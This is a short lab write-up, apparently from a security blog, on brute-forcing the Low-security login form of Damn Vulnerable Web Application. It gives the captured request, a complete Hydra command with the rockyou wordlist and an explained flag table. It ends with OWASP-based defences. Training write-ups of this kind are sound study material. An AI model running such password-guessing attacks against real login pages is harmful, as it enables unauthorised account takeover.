DVWA — Brute Force (Low)

Hydra against the basic login form. No CSRF, no lockout, no rate limit — textbook target.

May 16, 2026

Setup

Damn Vulnerable Web Application's Brute Force module at security level Low posts to vulnerabilities/brute/ with parameters username, password, and Login. There is no CSRF token, no captcha, and no lockout — so we can spray with a credential wordlist.

Capture the request

Log into DVWA, set security to Low, open vulnerabilities/brute/ and submit anything. In Burp/your browser's network panel you'll see:

GET /vulnerabilities/brute/?username=admin&password=test&Login=Login HTTP/1.1
Cookie: PHPSESSID=...; security=low

The response includes the string Username and/or password incorrect. on failure. That's our negative-match signal.

Run Hydra

hydra \
  -l admin \
  -P /usr/share/wordlists/rockyou.txt \
  -e ns \
  -t 8 \
  -f \
  127.0.0.1 \
  http-get-form \
  "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=<your-sid>; security=low"

Flags:

FlagMeaning
-l adminsingle login name
-P filepassword list
-e nsalso try the username as the password, and empty
-t 88 parallel tasks
-fstop on first hit
F=incorrectfailure marker in the response body
H=Cookie: ...pinned session so DVWA accepts our requests

Hydra finds admin:password within seconds — a pairing that lives at the top of every default credential list.

Why "low" is the easy mode

  • No CSRF token → no need to GET first to extract a nonce per attempt
  • No lockout → unlimited attempts
  • No timing jitter → 8-thread concurrency is fine
  • Plain GET form → trivial to fuzz

The Medium level adds an artificial sleep on failure and High introduces a per-request CSRF token (user_token) you have to scrape and resubmit. We'll cover those in their own writeups.

Defense reading

OWASP ASVS V2 (Authentication) covers the controls every login form should ship with:

  • Per-user lockout / exponential backoff
  • Standardized error messages (no "username not found" vs "wrong password" split)
  • Rate limiting by IP, account, and credential pair
  • CAPTCHA after N failures
  • 2FA where the data is worth protecting

Comments

Comments are not configured yet.